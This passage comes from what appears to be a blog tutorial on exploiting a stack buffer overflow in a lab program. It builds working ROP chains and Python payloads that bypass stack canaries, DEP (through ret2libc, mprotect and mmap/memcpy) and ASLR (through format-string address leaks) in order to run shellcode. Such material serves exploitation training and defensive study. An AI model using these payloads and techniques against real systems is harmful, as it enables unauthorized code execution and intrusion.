# Generated by ropper ropchain generator #
from struct import pack
p = lambda x : pack('Q', x)
IMAGE_BASE_0 = 0x0000000000000000 # 2f1f84e0f4df64e0eb1829fabd8720136456dc4efce9962cb1188f8d436e30b0
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = ''
rop += rebase_0(0x000000000003c714) # 0x000000000003c714: pop r13; ret;
rop += '//////id'
rop += rebase_0(0x000000000002aa5f) # 0x000000000002aa5f: pop rbx; ret;
rop += rebase_0(0x00000000001e7000)
rop += rebase_0(0x000000000005e961) # 0x000000000005e961: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000003c714) # 0x000000000003c714: pop r13; ret;
rop += p(0x0000000000000000)
rop += rebase_0(0x000000000002aa5f) # 0x000000000002aa5f: pop rbx; ret;
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x000000000005e961) # 0x000000000005e961: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002a205) # 0x000000000002a205: pop rdi; ret;
rop += rebase_0(0x00000000001e7000)
rop += rebase_0(0x000000000002bb39) # 0x000000000002bb39: pop rsi; ret;
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x000000000010d37d) # 0x000000000010d37d: pop rdx; ret;
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x0000000000043067) # 0x0000000000043067: pop rax; ret;
rop += p(0x000000000000003b)
rop += rebase_0(0x000000000008ed72) # 0x000000000008ed72: syscall; ret;
print(rop)
[INFO] rop chain generated!
As you can see, the tool has created a full ROP chain for us to execute System Call (execve("id")
). All we need to do is set the variable IMAGE_BASE_0
to the libc base address at runtime. Unfortunately, this is very limited, and the tool cannot create chains for everything we need, nor can it be completely reliable, as the cases vary from program to program and from one bug to another.
Return To Libc ( ret2libc )
Let’s practice on the first example presented in this blog and this time we will not compile it using the -zexecstack
option.

Notice that the first time we compiled with the -zexecstack
option, the exploitation succeeded, and the shellcode executed successfully, but the second time, when we did not use that option, the exploitation failed, and the shellcode did not execute.
We need to change our code execution strategy so that instead of making the program jump to execute the code injected into the stack, we make it return to libc and run the system function, which allows us to run commands on the system. The system function takes exactly one argument, the command in a null-terminated string. According to the Linux calling convention, the first parameter for any function call should passed over the rdi register, so we need a ROP gadget that sets our command address to rdi, and once this gadget returns, the saved instruction pointer should be another gadget that call the system function.

Great. Using the Peda searchmem
command, we found the string “id” in the C library that we will use as a parameter to the system function.
gdb-peda$ x/s 0x7ffff7f5a078
0x7ffff7f5a078: "id"
Okay, now we need a ROP gadget that sets this pointer to the RDI register. A typical ROP gadget is pop rdi; ret
, so we’ll replace the instruction pointer with the address of that gadget and put the command address next to it. Now, we’re ready to call the system function. We’ll follow the same approach: we’ll put the system function on the stack and use the pop rax; ret
gadget to retrieve it, and then we’ll use the call rax
gadget. But then the process will crash because once the system function finishes and returns, the next instruction pointer will be an address for something not under our control. So, we must call the exit function afterward to close the program properly. Fortunately, I found a gadget that calls a register (call rax
) and then calls the exit function without us having to do it ourselves.
(gdb) x/3i 0x7ffff7dd7d66
0x7ffff7dd7d66 <__libc_start_call_main+118>: call *%rax
0x7ffff7dd7d68 <__libc_start_call_main+120>: mov %eax,%edi
0x7ffff7dd7d6a <__libc_start_call_main+122>: call 0x7ffff7df0280 <__GI_exit>
(gdb)
We build our ROP chain as follows:
def hijack_exec(p: Popen, canary):
payload = b""
payload += b"A" * 0x112 # Fills the stack frame
payload += struct.pack( "<Q", canary ) # Places the correct canary value
payload += b"B" * 0x8 # Base pointer
payload += struct.pack( "<Q", 0x7ffff7dd8205 ) # pop rdi; ret
payload += struct.pack( "<Q", 0x7ffff7f5a078 ) # The command address ( id )
payload += struct.pack( "<Q", 0x7ffff7df1067 ) # pop rax; ret
payload += struct.pack( "<Q", 0x7ffff7e008f0 ) # system function address
payload += struct.pack( "<Q", 0x7ffff7dd7d66 ) # call rax ; system( "id" ); exit( 0 )
p.stdin.write( b"1\n" )
p.stdin.write( payload + b"\n" )
p.stdin.flush()
Let’s try this strategy against the program and see if it works.

Force Disable DEP Protection & Execute Arbitrary Code
Operating systems provide low-level APIs that allow us to modify the permissions of memory pages at runtime. Windows, for example, provides an API called VirtualProtect
and an even lower-level native API called NtProtectVirtualMemory
that does this. On the other hand, Unix-based systems provide similar APIs that accomplish the same task, such as mprotect
. These facts can be abused to force the targeted program to execute our evil instructions.
We can abuse the mprotect
function to make the stack executable and then force the program to execute instructions injected into the stack. The mprotect
declaration is as follows:
int mprotect(void addr[.size], size_t size, int prot);
It takes exactly three paramters:
- addr: The starting address of the memory region, which must be aligned to the page boundary.
- size: The length in bytes of the address range.
- prot: The desired access protection. Such as
PROT_READ
,PROT_WRITE
, andPROT_EXECUTE
.
According to the Linux x64 calling convention, the three parameters must be passed through the RDI, RSI, and RDX registers. We need to build a ROP chain that performs the following:
- Set a stack address aligned with the page boundary to RDI, which can be done by writing that address into the stack and retrieving it via pop gadget (
pop rdi; ret
). - Set the desired size to RSI by writing it into the stack and retrieving it via pop gadget (
pop rsi; ret
). - Set the desired protection to RDX by writing it into the stack and retrieving it via pop gadget (
pop rdx; ret
). - Put the direct address of
mprotect
on the stack as a return address so that the program can jump directly to executing it. - Put the shellcode address next to the
mprotect
address so that it gets executed once the API returns.
def hijack_exec(p: Popen, canary):
shellcode = 0x7fffffffddb0 + 0x40 # Shellcode Address
stack_page = shellcode & 0xfffffffffffff000 # Aligne the address to the page boundary.
payload = b""
payload += b"A" * 0x112 # Fills the stack frame
payload += struct.pack( "<Q", canary ) # Places the correct canary value
payload += b"B" * 0x8 # Base pointer
payload += struct.pack( "<Q", 0x7ffff7dd8205 ) # pop rdi; ret
payload += struct.pack( "<Q", stack_page ) # The aligned stack page address
payload += struct.pack( "<Q", 0x7ffff7dd9b39 ) # pop rsi; ret
payload += struct.pack( "<Q", 0x1000 ) # Page size
payload += struct.pack( "<Q", 0x7ffff7ebb37d ) # pop rdx; ret
payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 ) # Protections: PROT_EXEC=0x01, PROT_WRITE=0x02, PROT_READ=0x04
payload += struct.pack( "<Q", 0x7ffff7ebb200 ) # mprotect function address
payload += struct.pack( "<Q", shellcode ) # Jump into shellcode
payload += b"\x90" * 0x40 # NOPs for padding
payload += buf # Shellcode
p.stdin.write( b"1\n" )
p.stdin.write( payload + b"\n" )
p.stdin.flush()
Let’s run this exploitation strategy and see what happens.

Alternatively, in Windows, it is possible to use functions like NTSetInformationProcess
and SetProcessDEPPolicy
to disable such protection and make the memory executable depending on the configured DEP mode. In Unix-based systems, there are some similar methods, where we can use a low-level API called personality
and pass the READ_IMPLIES_EXEC
flag as parameter to it, which will make the memory that will be mapped later executable even if it has not been mapped with execute permissions (this will not work on previously created heaps).
One effective method is to map new memory with execute permissions, then move the malicious instructions to that memory and redirect the execution flow of the program to execute those instructions. In Windows, there are several low-level APIs that help with this, such as VirtualAlloc
, NtAllocateVirtualMemory
, WriteProcessMemory
, and NtWriteVirtualMemory
. On the other hand, Unix-based systems have functions that do the same thing, such as mmap
. Let’s follow this approach in developing our own exploit.
We need to build a ROP chain does exactly the following:
pExecutableMemory = mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 );
memcpy( pExecutableMemory, pShellcode, ulShellSize );
pExecutableMemory(); // jmp/call pExecutableMemory
The mmap
declaration is exactly as follows:
void *mmap(void addr[.length], size_t length, int prot, int flags, int fd, off_t offset);
It takes the following parameters:
- addr: The starting address for the new mapping is specified in addr or NULL.
- length: The length of the mapping.
- prot: The desired access protection. Such as
PROT_READ
,PROT_WRITE
, andPROT_EXECUTE
. - flags: This determines whether updates to the mapping are visible to other processes mapping the same region, and whether updates are carried through to the underlying file.
- fd: The file descriptor (this argument is ignored when
MAP_ANONYMOUS
flag was used). - offset: The offset of the mapping memory in fd (this argument must be zero when using the
MAP_ANONYMOUS
flag).
Reminder: According to the x64 Linux Calling Convention, the six parameters must be passed to functions through registers in this order, rdi, rsi, rdx, rcx, r8, r9. So for calling that API we need to build a ROP chain that does the following:
- We have to set rdi to NULL. I couldn’t find neither
mov rdi, 0; ret
norxor rdi, rdi; ret
gadgets, so the alternative ispop rdi; ret
, with zeros in the stack immediately after the gadget (We have no problem with \x00 as it is not a bad byte for the vulnerable program). - The rsi register must be set to the appropriate size, for example 0x1000 (the memory page size). This gadget
pop rsi; ret
is convenient. - The rdx register must be set to the disered protections (PROT_EXEC|PROT_READ|PROT_WRITE), we’ll use
pop rdx; ret
for that. - The rcx register must be set to the disered flags (MAP_ANONYMOUS|MAP_SHARED), we’ll use
pop rcx; add eax, 0x1734ba; ret
for that. This gadget changes the eax value but we don’t care about the eax register right now so that’s ok. - Register r8 needs to be set to -1, and -1 is exactly 0xffffffffffffff, so we’ll write this to the stack and retrieve it with the
pop r8; ret
gadget. - The last parameter is zero so register r9 should be set to zero, but at this point it already holds zero so we don’t have to do anything with it.
- The
mmap
address must be set as a return address so that the system call will be executed after all its parameters have been set.
The next step is to copy our malicious code to the memory allocated by the mmap
using the memcpy
function. The memcpy
function is declared as follows:
void *memcpy(void dest[restrict .n], const void src[restrict .n], size_t n);
It takes exactly three parameters:
- dest: The destination memory address to copies to.
- src: The source memory address that copies from.
- n: Number of bytes to be copied.
To do this we must complete our ROP chain as follows:
- The rdi register needs to be set to the mapping memory address returned by
mmap
in rax register. Unfortunately, I couldn’t find an appropriate gadget that moves the rax value to the rdi likemov rdi, rax; ret
orpush rax; pop rdi; ret
, but thanks god, I managed to find a gadget that swaps themxchg rdi, rax; cld; ret;
. - The rsi register needs to be set to the shellcode address which is in the stack, so the gadget
pop rsi; ret
always comes to the rescue. - The rdx needs to be set to the shellcode size, and as before we’ll use
pop rdx; ret
. - The
memcpy
address must be set as a return address so that it get executed.
Now everything is in order and we just need to jump into that executable memory to make our shellcode run out. At this point, The rdi register holds the executable memory address (shellcode), so we need a gadget like jmp rdi
or call rdi
(the shellcode will kill the process, so we don’t care whether flow control is lost or not). But I found an alternative gadget which is push rdi; adc al, 0x48; lea eax, [rdi + 0x15]; ret;
, this gadget pushes the executable shellcode address onto the stack, adding the carry flag + 0x48 to al, and then load the rdi value + 0x15 to eax (it’s valid and convenient). Once the gadget returns, the next return address will be the shellcode due to the push
instruction.
def hijack_exec(p: Popen, canary):
shellcode = 0x7fffffffddb0 + 0x40 # Shellcode Address
payload = b""
payload += b"A" * 0x112 # Fills the stack frame
payload += struct.pack( "<Q", canary ) # Places the correct canary value
payload += b"B" * 0x8 # Base pointer
payload += struct.pack( "<Q", 0x7ffff7dd8205 ) # pop rdi; ret
payload += b"\x00" * 0x8 # addr = NULL
payload += struct.pack( "<Q", 0x7ffff7dd9b39 ) # pop rsi; ret
payload += struct.pack( "<Q", 0x1000 ) # Page size
payload += struct.pack( "<Q", 0x7ffff7ebb37d ) # pop rdx; ret
payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 ) # Protections: PROT_EXEC=0x01, PROT_WRITE=0x02, PROT_READ=0x04
payload += struct.pack( "<Q", 0x7ffff7ded94c ) # pop rcx; add eax, 0x1734ba; ret;
payload += struct.pack( "<Q", 0x01 | 0x20 ) # flags: MAP_SHARED=0x01 MAP_ANONYMOUS=0x20
payload += struct.pack( "<Q", 0x7ffff7fd9efb ) # pop r8; ret
payload += b"\xff" * 0x8 # fd = -1
payload += struct.pack( "<Q", 0x7ffff7eba9a0 ) # mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 )
payload += struct.pack( "<Q", 0x7ffff7f288a1 ) # xchg rdi, rax; cld; ret;
payload += struct.pack( "<Q", 0x7ffff7dd9b39 ) # pop rsi; ret
payload += struct.pack( "<Q", shellcode ) # Shellcode address
payload += struct.pack( "<Q", 0x7ffff7ebb37d ) # pop rdx; ret
payload += struct.pack( "<Q", len(buf) + 0x40 ) # Shellcode size for memcpy
payload += struct.pack( "<Q", 0x7ffff7feb6e0 ) # memcpy( exec_mem, shellcode, shellsize )
# Execute the shellcode
payload += struct.pack( "<Q", 0x7ffff7e5ce42 ) # push rdi; adc al, 0x48; lea eax, [rdi + 0x15]; ret;
payload += b"\x90" * 0x40 # NOPs for padding
payload += buf # Shellcode
p.stdin.write( b"1\n" )
p.stdin.write( payload + b"\n" )
p.stdin.flush()
Let’s fire:


Address Space Layout Randomization ( ASLR )
Most of the exploit strategies we’ve used always require fixed addresses to use, such as shellcode addresses in the stack, critical data addresses like canaries to leak, and ROP gadget addresses. Without knowing the addresses of this critical data, the exploit will fail completely. This protection is designed to kill this approach.
ASLR essentially randomizes the base address of the executable file when the program is loaded into memory and also randomizes the loaded libraries, stack, and heap. Thus, if an attacker gains control over the execution flow (such as controlling the instruction pointer), the location of the code to be executed, the addresses of the ROP gadgets, and everything else needed for the exploit are completely unknown. To understand how this protection exactly works, we first need to know how operating systems manage memory and the considerations behind it. Actually, what we see during debugging and the addresses we interact with are not actual physical memory addresses but virtual memory addresses. I’ll explain why operating systems work this way and what the benefits are.
In our current era, physical memory space is extremely limited compared to the needs of users who want to use numerous programs simultaneously and even servers that serve thousands or millions of clients. All of this is completely unsuitable for RAM sizes. Furthermore, RAM is very expensive, not only financially, but also because increasing it negatively impacts other aspects such as energy consumption and overall computer performance. Virtual memory thus came to solve these problems.
Virtual memory can be defined as a method of memory management by the operating system that simulates a memory larger than physical memory. It allows many programs whose size is larger than physical memory to run in a very intelligent way that allows loading part of the data into physical memory, but not the entire data. The hard disk is used to store data that is not in use. When the data’s turn comes, the memory manager swaps it to physical memory. To keep track of the data and its actual locations in physical memory, the memory manager builds a map table that identifies the virtual addresses of the data and the corresponding addresses of that data in physical memory, as well as additional information that identifies which virtual addresses belong to which process. Have you ever noticed that the same addresses are repeated in different processes running at the same time?
Operating Systems Concepts book ch9
This mapping table (Page Table) plays a vital role, helping the operating system translate virtual addresses into real physical addresses when a particular process requests access to these virtual addresses. The operating system works along with the memory management unit (MMU) in the CPU to perform this task. So, that’s the reason of why no collisions occur when different processes attempt to access the same virtual addresses.
Normally, when the ASLR is disabled, the operating system maps processes to a fixed virtual memory range. But, when it is enabled, the operating system selects random ranges each time the program is run. The Page Table will always help the memory manager translate these virtual addresses into physical addresses; it doesn’t care; they’re just numbers to it. I would like to point out here that data addresses in physical memory is essentially random whether you have ASLR enabled or not and in different locations each time the program is run. The whole problem lies with the virtual memory management system.
Defeating ASLR
Yes, this protection makes things more difficult and makes exploitation more complex, especially when used in conjunction with the other protections mentioned above. However, there is still a lot we can do to bypass this protection. One strategy is to leak the required addresses using any memory disclosure bug or other techniques so we can defeat the randomization and circumvent the protection. To build our ROP chain, we only need a single address belonging to the module/library. From this address, we can calculate the base address of the module and also all the required ROP gadgets.

As shown in the image, there are addresses in the stack relative to the Libc and also an address relative to the stack. We need to leak these addresses to dynamically calculate the addresses of the important ROP Gadgets we need, as well as the shellcode address. So, we need to update our leak_canary
function to leak those required addresses, and rename it to an appropriate name such as leak_stuff
.
def leak_stuff(p: Popen):
p.stdin.write( b"1\n" + b"%49$p %51$p %67$p\n" + b"2\n" )
p.stdin.flush()
out = b""
pos = -1
n = 0
while n < 1024:
out = p.stdout.readline()
pos = out.find( b"0x" )
if bool( ~pos ):
break
n += 1
else:
return [ -1 ] * 3
info = []
n = 3
while bool( n ):
out = out[pos:]
end = out.find( b" " )
info += [ int(out[:end], 16) ]
pos = ( end + 1 )
n -= 1
return info
After leaking them, we need to modify the hijack_exec
function, giving it the C library base address and the shellcode address as arguments. But first, we need to calculate the information we need from these leaked addresses.
(gdb) p/x 0x7ffff7dd7d68-0x00007ffff7dae000
$1 = 0x29d68
The leaked address relative to the Libc, when subtracted from the library’s base address, gives us this result. Therefore, we must subtract the leaked address from this result to give us the library’s base address.
(gdb) p/x 0x7fffffffde98-(0x7fffffffddb0+0x40)
$2 = 0xa8
The leaked address relative to the Stack, when subtracted from the shellcode address, gives us this result. Therefore, we must subtract the leaked address from this result to give us the shellcode address.
def hijack_exec(p: Popen, canary, libc_base, shellcode):
stack_page = shellcode & 0xfffffffffffff000 # Aligne the address to the page boundary.
payload = b""
payload += b"A" * 0x106 # Fills the stack frame
payload += struct.pack( "<Q", canary ) # Places the correct canary value
payload += b"B" * 0x8 # Base pointer
payload += struct.pack( "<Q", libc_base + 0x2a205 ) # pop rdi; ret
payload += struct.pack( "<Q", stack_page ) # The aligned stack page address
payload += struct.pack( "<Q", libc_base + 0x2bb39 ) # pop rsi; ret
payload += struct.pack( "<Q", 0x1000 ) # Page size
payload += struct.pack( "<Q", libc_base + 0x10d37d ) # pop rdx; ret
payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 ) # Protections: PROT_EXEC=0x01, PROT_WRITE=0x02, PROT_READ=0x04
payload += struct.pack( "<Q", libc_base + 0x10d200 ) # mprotect function address
payload += struct.pack( "<Q", shellcode ) # Jump into shellcode
payload += b"\x90" * 0x40 # NOPs for padding
payload += buf # Shellcode
p.stdin.write( b"1\n" )
p.stdin.write( payload + b"\n" )
p.stdin.flush()
Now, this function can efficiently calculate all the required ROP gadgets addresses dynamically based on their relative virtual addresses (RVA) to the Libc base address. We now need to modify only two lines in the main function.
canary, libc_relative_addr, stack_relative_addr = leak_stuff( p )
And
hijack_exec( p, canary, libc_relative_addr-0x29d68, stack_relative_addr-0xa8 )
Now, everything is in order.

Notice that when we run the exploit while the ASLR is running (on different modes), it works despite the randomization of the addresses, as shown in the picture.
Other Bypassing Techniques
There are many methods and techniques for bypassing and circumventing ASLR. It all depends on the targeted system’s nature, functionality, and the environment in which it operates. The solutions are endless, but they require some diligence and careful thinking. Here are some methods that can be used:
-
Non-aware ASLR Modules: Not all libraries are ASLR-protected, especially on Windows. In this case, the operating system is forced to load them into a fixed virtual memory address. This fact can be abused to build a stable ROP chain that helps us execute our code or do whatever we want.
-
Low ASLR Entropy: Sometimes the ASLR is not implemented properly, randomizing addresses in a non-optimal way, where one or two bytes change, while the rest remain constant. In this case, if we are targeting a local binary that can be run multiple times or a network program that acts as a service and is automatically restarted when it crashes, the chances of it being exploited via brute force attacks increase. If you think I am joking or that this bullshit is not feasible, I would like to tell you that even in 2025, we are still seeing the use of such strategies as CVE-2025-0282.
Conclusion
The methods of circumventing various protections always depend primarily on the nature of the target, the environment in which it operates, its specific functionality, and many other factors of this kind. I would like to say that there is no magic method that anyone will tell you that will always allow you to bypass everything. Perhaps, yes, there are general ideas for each protection that help in bypassing it, but it depends on you. No one will help you except your experience and technical and practical skills. Perhaps a small detail in the program you are targeting, if used in an creative way, might allow you to bypass these protections. To improve your level and become able to develop your own creative exploitation strategies, you need to train and practice a lot. No one can develop complex and advanced exploits just by learning such vulnerabilities and attacks without practice and facing many scenarios. It comes gradually when you encounter many scenarios and read about different exploits. So, I advise you to read a lot and try to build exploits for previously discovered vulnerabilities yourself. This will help you a lot and improve your level insanely.